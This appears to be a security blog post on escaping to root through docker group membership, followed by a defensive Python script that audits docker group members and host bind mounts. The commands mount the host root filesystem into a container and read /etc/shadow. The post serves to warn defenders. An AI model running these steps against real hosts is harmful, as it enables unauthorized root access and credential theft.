I don’t think Docker needs an introduction at this point, but in case you are unfamiliar with it: it is a form of OS-level virtualization that isolates software packages in “containers.” It works much like a traditional virtual machine, but with far less overhead, since the kernel is shared between containers.
The problem arises when a host user is added to the docker group. Since the Docker daemon runs as root and membership of the docker group grants access to it, anyone who gets hold of that host user’s account (ordinary user privileges are enough) can escalate to root simply by mounting the host filesystem into one of the containers, which gives the attacker full access to it.
First, make sure the host user is part of the docker group:
```
alice@jada:~$ groups
alice cdrom floppy audio dip video plugdev netdev bluetooth docker
```
Run docker container ps to get a quick list of the containers:
```
alice@jada:~$ docker container ps
CONTAINER ID   IMAGE        COMMAND                  NAMES
f00ba96171c5   container1   "docker-php-entrypoi…"   container1
ce2ecb56a96e   container2   "/etc/bind/entrypoin…"   container2
620b296204a3   container3   "/usr/sbin/sshd -D"      container3
```
From here you can spawn a tty for each container:
```
alice@jada:~$ docker run -ti container1 bash
root@f00ba96171c5:/#
```
Even better, you can specify -v to mount the entire filesystem of the host into one of the containers before accessing it. It doesn’t matter which one.
```
alice@jada:~$ docker run -v /:/mnt/pwned -ti container2
root@ce2ecb56a96e:/# cat /mnt/pwned/etc/shadow
```
You now have full access to the host volume; from here it’s just a matter of grabbing keys, hashes, and whatnot to get a shell.
Don’t assign users to the docker group.
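For the defending side, here is a small audit script (an added example, not code from the original post) that covers both checks the post implies: who is in the docker group, and whether any running container bind-mounts the host root (or another sensitive host path) the way the `-v /:/mnt/pwned` run above does. It assumes you feed it the text of `/etc/group` (or `getent group docker`) and the JSON that `docker inspect $(docker ps -q)` prints; the sample data below is constructed to mirror the post.

```python
import json
from pathlib import PurePosixPath

# Host paths that should not be bind-mounted into an ordinary container.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/home", "/var/run/docker.sock")


def docker_group_members(group_file_text):
    """Parse /etc/group style content and return the members of the docker group."""
    for line in group_file_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u]
    return []


def risky_mounts(inspect_output):
    """Return (container, source, destination, rw) for every bind mount whose
    host source is one of SENSITIVE_HOST_PATHS or an ancestor of one."""
    findings = []
    for container in json.loads(inspect_output):
        name = container.get("Name", "").lstrip("/")
        for mount in container.get("Mounts", []):
            if mount.get("Type") != "bind":
                continue  # named volumes live under /var/lib/docker, not the host tree
            src = PurePosixPath(mount["Source"])
            if any(src == PurePosixPath(p) or src in PurePosixPath(p).parents
                   for p in SENSITIVE_HOST_PATHS):
                findings.append((name, str(src), mount["Destination"], mount.get("RW", True)))
    return findings


# Constructed sample data standing in for `getent group docker` and
# `docker inspect $(docker ps -q)` output on the host from the post.
SAMPLE_GROUP = "docker:x:999:alice\nsudo:x:27:\n"
SAMPLE_INSPECT = json.dumps([
    {"Name": "/container2",
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt/pwned", "RW": True}]},
    {"Name": "/container1",
     "Mounts": [{"Type": "volume", "Name": "data",
                 "Source": "/var/lib/docker/volumes/data/_data", "Destination": "/data", "RW": True}]},
    {"Name": "/container3",
     "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/var/www", "RW": False}]},
])

if __name__ == "__main__":
    print("docker group members:", docker_group_members(SAMPLE_GROUP))
    for name, src, dst, rw in risky_mounts(SAMPLE_INSPECT):
        print(f"ALERT: {name} bind-mounts host {src} at {dst} ({'rw' if rw else 'ro'})")
```

A non-empty docker group on a multi-user host, or any alert from the mount check, is the condition the post warns about; running this from cron or a config-management check catches both before a container with the host root mounted is ever started.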